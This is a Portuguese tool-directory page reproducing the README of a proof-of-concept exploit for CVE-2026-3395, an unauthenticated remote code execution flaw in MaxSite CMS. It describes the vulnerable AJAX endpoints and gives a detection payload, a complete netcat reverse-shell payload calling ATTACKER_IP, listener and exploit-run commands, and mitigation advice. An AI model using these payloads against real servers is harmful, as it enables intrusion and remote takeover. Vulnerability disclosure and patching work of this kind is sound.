Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

Prova de conceito de exploit para execução remota de código não autenticada no MaxSite CMS <= 109.1 por meio de endpoints AJAX do editor MarkItUp, com payloads de detecção e reverse shell.

Ver Repositório
5há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE‑2026‑3395 — Execução Remota de Código Não Autenticada no MaxSite CMS

Author Country Instagram GitHub CVE Exploit Type CVSS

Visão Geral

Vulnerabilidade de Execução Remota de Código (RCE) Não Autenticada no MaxSite CMS ≤ 109.1.

A falha decorre de verificações de autorização fracas nos endpoints AJAX do plugin do editor MarkItUp, combinadas com a execução insegura de código PHP fornecido pelo usuário pelo plugin run_php.

  • Descoberta / Corrigida: Março de 2026
  • Corrigida na versão: MaxSite CMS 109.2
  • Fornecedor: MaxSite CMS
  • Repositório: maxsite/cms

Descrição

A vulnerabilidade afeta os seguintes arquivos no plugin do editor MarkItUp:

  • preview-ajax.php
  • autosave-post-ajax.php

Esses endpoints:

  • São acessíveis sem autenticação
  • Realizam apenas validação fraca de referrer (facilmente contornada)
  • Passam a entrada do usuário para o plugin run_php
  • Executam shortcodes [php]...[/php] usando eval()

Um atacante pode enviar uma solicitação POST manipulada para a rota /ajax/ contendo um caminho interno codificado em Base64 e um payload PHP malicioso por meio do parâmetro data, resultando em:

🚨 Execução Remota de Código Totalmente Não Autenticada


Diagrama do Fluxo de Ataque

root@kitploit:~
graph TD
    A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
    B -->|"Referer Spoofing"| C["preview-ajax.php"]
    C -->|"Unsanitized Input"| D["run_php Plugin"]
    D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
    E -->|"Command Execution"| F["Compromised Server"]

Pré‑requisitos

  • Versão do MaxSite CMS ≤ 109.1
  • Plugin run_php habilitado (padrão comum)
  • Configuração do PHP permitindo eval()

Exploração

Um exploit de prova de conceito em Python 3 (exploit.py) está incluído.

Payload de Detecção (Não Destrutivo)

root@kitploit:~
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

Payload de Reverse Shell

root@kitploit:~
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

Uso

1. Iniciar Listener

root@kitploit:~
nc -lvnp 9001

2. Executar o Exploit

root@kitploit:~
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

Mitigação

Ações Imediatas

  • Atualize para MaxSite CMS 109.2 ou posterior
  • Desative o plugin run_php se não for necessário

Correção Manual

Adicione verificações de autenticação aos arquivos vulneráveis:

root@kitploit:~
if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

Referências

  • Commit da Correção https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • Entrada da Vulnerabilidade https://vuldb.com/?id.348281

  • Registro NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3395


Aviso Legal

Este projeto é fornecido para:

  • Pesquisa de segurança
  • Fins educacionais
  • Testes de penetração autorizados

⚠️ Não use contra sistemas sem permissão explícita.

O autor não assume responsabilidade por uso indevido ou danos.


Autor

Mohammed Idrees Banyamer Jordânia 🇯🇴 Pesquisador de Segurança

banyamer_security — Silent Hunter • Shadow Presence

Março de 2026

Baixar ferramenta